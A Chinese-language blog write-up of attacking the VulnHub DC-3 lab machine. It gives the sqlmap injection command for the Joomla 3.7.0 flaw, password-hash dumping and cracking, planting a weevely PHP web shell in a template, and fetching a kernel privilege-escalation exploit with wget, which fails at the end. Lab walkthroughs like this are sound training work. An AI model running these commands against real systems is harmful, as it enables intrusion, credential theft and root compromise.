vulnhub-DC:3靶機滲透記錄

1_Ry發表於2021-07-29

準備工作

在vulnhub官網下載DC:1靶機www.vulnhub.com/entry/dc-3,312/

匯入到vmware

匯入的時候遇到一個問題

 

 解決方法:

點 “虛擬機器”->“設定”->選擇 “磁碟/光碟機IDE裝置" ->點 ”高階“,

將要 啟動裝置 設定到 IDE 0:0 上就可以了

開啟kali準備進行滲透(ip:192.168.200.6)

 

資訊收集

 利用nmap進行ip埠探測

nmap -sS 192.168.200.6/24  

 

 探測到ip為192.168.200.14的靶機,開放了80埠,這裡吸取到dc2的教訓,再用nmap對所有埠進行探測

nmap -sV -p- 192.168.200.14 

 

 已經沒有別的埠開放了,那就進入網站看看

 

 首頁給到的資訊是隻有一個flag和一個入口,讓我們直接獲取root許可權,簡單粗暴

網站用的是Joomla框架,可以使用joomscan工具獲取其框架的詳細版本資訊

 

 再用dirsearch對目錄進行掃描看看有沒有別的有用資訊

dirsearch -u http://192.168.200.14:80

 

 除了個後臺登陸頁面好像沒有別的有用的資訊了http://192.168.200.14/administrator/index.php

 

Joomla

使用joomscan進行掃描,在kali直接下載

apt install joomscan

joomscan -u 192.168.200.14

 

 

 看到版本是joomla3.7.0

百度到joomla存在sql注入漏洞CVE-2017-8917

但在msf不能直接利用這個漏洞

 

只能在searchploit中查詢關於這個漏洞的利用方法

searchsploit joomla 3.7

可以開啟txt檔案檢視具體的利用方法說明(絕對路徑為/usr/share/exploitdb/exploits/php/webapps/42033.txt)

 

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt 

 直接告訴我們使用sqlmap,payload都寫好給你了

 

漏洞利用——sql注入

使用sqlmap用剛剛得到的payload直接跑

sqlmap -u "http://192.168.200.14/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

 得到5個資料庫,接下來檢視joomladb資料庫中的表

sqlmap -u "http://192.168.200.14/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

拿到表名#__users,接下來檢視列名

sqlmap -u "http://192.168.200.14/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]

 拿到列名後就可以看資料了

sqlmap -u "http://192.168.200.14/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password,username --dump -p list[fullordering]

得到加密的密碼$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

去md5線上解密網站也解不出,但應該也是某種hash加密,只能祭出強大的John the Ripper(密碼破解工具)

儲存一下密碼,直接用john爆破

 得到密碼snoopy

 去之前掃到的後臺登陸介面登陸後臺

 

漏洞利用——檔案上傳

在後臺管理頁面中找到了檔案上傳的地方,準備測試一下有沒有檔案上傳的漏洞

 使用weevely(linux中的蟻劍)工具生成後門木馬

weevely generate test test.php

這樣就生成了後門木馬

但這裡的檔案上傳的地方好像不行,只能在裡面建立一個檔案,然後將程式碼複製進去

 

 

然後用weevely連線shell(這裡的url是test.php的路徑)

weevely http://192.168.200.14/templates/beez3/test.php test

 連線成功,現在已經拿到一個webshell,但只有www-data許可權,開始提權

 

 

許可權提升

檢視核心版本

uname -a

 

 

使用linux 4.4.0-21-generic #37-Ubuntu,在網上查詢是ubuntu16.04

在searchploit尋找關於ubuntu16.04的許可權提升的漏洞

searchsploit ubuntu 16.04 linux

 

 開啟檔案檢視漏洞具體利用方法

cat /usr/share/exploitdb/exploits/linux/local/39772.txt 

 

 下載exp到dc3的本地

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

 

 解壓 unzip 39772.zip,再解壓tar -xvf exploit.tar

 

 接下來就執行剛剛漏洞利用檔案演示的程式碼

./compile.sh
./doubleput

但是我不知道什麼情況執行了之後報錯,看了看別人的也有一位和我一樣卡住不知道什麼原因

 就差最後一步就可以拿到flag了。。。以後有時間在看看是怎麼回事

 

參考文章

靶機實戰-DC-3_滕財然的部落格-CSDN部落格

Vulnhub之路Ⅵ——DC-3(最後一步卡住) - 知乎 (zhihu.com)

相關文章